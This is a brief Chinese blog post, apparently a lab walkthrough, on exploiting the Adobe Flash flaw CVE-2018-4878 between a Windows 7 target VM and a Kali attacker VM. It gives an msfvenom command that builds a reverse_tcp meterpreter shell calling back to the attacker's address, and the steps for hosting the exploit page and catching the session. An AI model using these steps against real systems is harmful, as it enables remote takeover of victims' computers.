Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞(CVE-2018-4878)。
攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会触发漏洞,可直接getshell。准备工作:靶机信息:192.168.2.134(windows 7 SP1)Flash版本:28.0.0.137攻击机信息:192.168.2.132(kali linux)漏洞利用脚本:CVE-2018-4878-master漏洞利用:

1.使用msfvenom生成shellcode,msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.132 LPORT=7777 -f python>shellcode.txt>。

2.替换原 cve-2018-4878.py中的shellcode,并修改参数stageless=False。3.在代码中修改要生成的文件和路径。4.执行修改后的cve-2018-4878.py文件,生成index和exploit两个文件。5.将生成的两个文件复制到web目录环境下。6.在kali的msf中启用监听。7.在win7主机中使用含漏洞的浏览器和Adobe Flash访问http://192.168.2.132/index.html,kali中即可获取到靶机会话。

原文链接

相关推荐: 挖洞经验 | 利用Android Studio发现安卓应用漏洞($3000)

本文讲述了作者在一次一次授权安全测试中,利用安卓平台集成开发环境Android Studio发现APP客户端身份验证绕过漏洞,获取用户密码。漏洞最终获得了APP官方总计$3000的奖励,一起来看看。 漏洞背景 为了更好的解释漏洞发现,我先简单介绍一下目标测试A…

最后修改:2021 年 04 月 27 日 06 : 28 PM
如果觉得我的文章对你有用,请随意赞赏